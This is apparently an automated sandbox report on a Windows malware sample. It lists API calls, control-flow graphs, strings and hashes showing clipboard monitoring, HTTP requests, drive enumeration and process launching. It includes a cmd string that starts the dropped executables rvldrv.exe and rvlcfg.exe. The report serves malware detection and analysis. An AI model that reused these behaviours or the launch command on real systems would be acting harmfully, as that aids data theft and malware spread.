• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
• memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
• InternetCloseHandle.WININET(00000000), ref: 0040F181
• InternetCloseHandle.WININET(00000000), ref: 0040F18E
• InternetCloseHandle.WININET(00000000), ref: 0040F19B
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
• String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
• API String ID: 2761394606-2217117414
• Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
• Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
• Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
• Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

Control-flow Graph

control_flow_graph 669 4059b0-4059d2 GetWindowLongW 670 4059d4-4059db 669->670 671 4059f6-4059fd 669->671 672 4059e1-4059e5 670->672 673 405a67-405a78 IsClipboardFormatAvailable 670->673 674 405a26-405a2c 671->674 675 4059ff 671->675 678 405a04-405a21 SetClipboardViewer SetWindowLongW 672->678 679 4059e7-4059eb 672->679 676 405a83-405a8d IsClipboardFormatAvailable 673->676 677 405a7a-405a81 673->677 681 405a46-405a4a 674->681 682 405a2e-405a44 SetWindowLongW 674->682 680 405be4-405bfd DefWindowProcA 675->680 684 405a98-405aa2 IsClipboardFormatAvailable 676->684 685 405a8f-405a96 676->685 683 405aab-405aaf 677->683 678->680 686 4059f1 679->686 687 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 679->687 688 405a62 681->688 689 405a4c-405a5c SendMessageA 681->689 682->688 691 405ab5-405abf OpenClipboard 683->691 692 405b7f-405b83 683->692 684->683 690 405aa4 684->690 685->683 686->680 687->680 688->680 689->688 690->683 691->692 693 405ac5-405ad6 GetClipboardData 691->693 694 405b85-405b95 SendMessageA 692->694 695 405b9b 692->695 696 405ad8 693->696 697 405add-405aee GlobalLock 693->697 694->695 695->680 696->680 698 405af0 697->698 699 405af5-405b06 697->699 698->680 700 405b08-405b0c 699->700 701 405b29-405b3c call 40d250 699->701 703 405b3e-405b4e call 4057f0 700->703 704 405b0e-405b12 700->704 710 405b51-405b65 GlobalUnlock CloseClipboard 701->710 703->710 707 405b14 704->707 708 405b16-405b27 call 405680 704->708 707->710 708->710 710->692 713 405b67-405b7c call 404970 call 40ab60 710->713 713->692
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004059BC
• SetClipboardViewer.USER32(?), ref: 00405A08
• SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
• OpenClipboard.USER32(00000000), ref: 00405AB7
• GetClipboardData.USER32(00000000), ref: 00405AC9
• RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
• ChangeClipboardChain.USER32(?,?), ref: 00405BDE
• DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                    • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                    • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                    • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                    • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 004058D8
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                    • wsprintfW.USER32 ref: 00405926
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                    • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                    • String ID: %x%X$0
                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                    • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                    • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

                                                                                                                                    Control-flow Graph (rendered basic-block graph omitted; legend: Executed / Not Executed)
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040E668
                                                                                                                                    • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                    • String ID: <$GET
                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                    • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                    • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
                                                                                                                                      • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                      • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                      • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                    • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                      • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                      • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                      • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                      • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                      • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                    • wsprintfW.USER32 ref: 00407072
                                                                                                                                    • wsprintfW.USER32 ref: 00407092
                                                                                                                                    • wsprintfW.USER32 ref: 004070B5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                    • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                    • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
• GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
• memcmp.NTDLL ref: 0040F35D
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
• CloseHandle.KERNEL32(00000000), ref: 0040F38A
• CloseHandle.KERNEL32(000000FF), ref: 0040F394
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
• WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
• CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
• String ID:
• API String ID: 3902698870-0
APIs
• GetCurrentThread.KERNEL32 ref: 0040DD56
• GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
• GetCurrentThread.KERNEL32 ref: 0040DD68
• SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
• InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
• EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
• WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
• LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
• Sleep.KERNEL32(00000001), ref: 0040DE5E
• GetCurrentThread.KERNEL32 ref: 0040DE6D
• SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
Similarity
• API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
• String ID:
• API String ID: 3862671961-0
APIs
• memset.NTDLL ref: 0040F40E
• memset.NTDLL ref: 0040F41E
• CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
• Sleep.KERNEL32(000003E8), ref: 0040F467
• ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
• Sleep.KERNEL32(000003E8), ref: 0040F49C
Similarity
• API ID: Sleepmemset$CreateExecuteProcessShell
• String ID: $D$open
• API String ID: 3787208655-2182757814
APIs
• CoInitialize.OLE32(00000000), ref: 0040666B
• CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
• wsprintfW.USER32 ref: 004066C4
• wsprintfW.USER32 ref: 004066E5
Strings
• /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
• %comspec%, xrefs: 004066EE
• cl@, xrefs: 004066A0
• /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
Similarity
• API ID: wsprintf$CreateInitializeInstance
• String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
• API String ID: 1147330536-497122036
APIs
• InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
• InterlockedDecrement.KERNEL32(?), ref: 00401DB0
• InterlockedDecrement.KERNEL32(?), ref: 00401DC3
• InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
• InterlockedDecrement.KERNEL32(?), ref: 00401E5B
• InterlockedDecrement.KERNEL32(?), ref: 00401EF6
• setsockopt.WS2_32 ref: 00401F2C
• closesocket.WS2_32(?), ref: 00401F39
  • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
  • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
Similarity
• API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
• String ID:
• API String ID: 671207744-0
APIs
• recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
• Sleep.KERNEL32(000003E8), ref: 0040E36E
• StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
• StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
• StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
Similarity
• API ID: Sleeprecvfrom
• String ID: HTTP/1.1 200 OK$LOCATION:
• API String ID: 668330359-3973262388
APIs
• InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
• HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
• InternetCloseHandle.WININET(00000000), ref: 0040F538
• InternetCloseHandle.WININET(00000000), ref: 0040F542
• Sleep.KERNEL32(000003E8), ref: 0040F54D
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                    • API String ID: 2743515581-2960703779
APIs
• InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
• CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
• GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
• CloseHandle.KERNEL32(00000000), ref: 0040BD92
• CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
  • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
  • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
• String ID:
• API String ID: 439099756-0
APIs
• InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
• CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
• GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
• UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
• CloseHandle.KERNEL32(00000000), ref: 00405D15
• CloseHandle.KERNEL32(000000FF), ref: 00405D1F
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
• String ID:
• API String ID: 3956458805-0
APIs
• EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
• memcpy.NTDLL(?,00000000,00000100), ref: 00406141
• CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
• FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
• CloseHandle.KERNEL32(000000FF), ref: 004062DD
• LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
• String ID:
• API String ID: 1457358591-0
APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
• SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
• SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeStringlstrcmpi
• String ID: device$deviceType
• API String ID: 1602765415-3511266565
APIs
• lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
• SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
• SysFreeString.OLEAUT32(00000000), ref: 0040EC97
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeStringlstrcmpi
• String ID: service$serviceType
• API String ID: 1602765415-3667235276
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
• LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
• SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
• SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
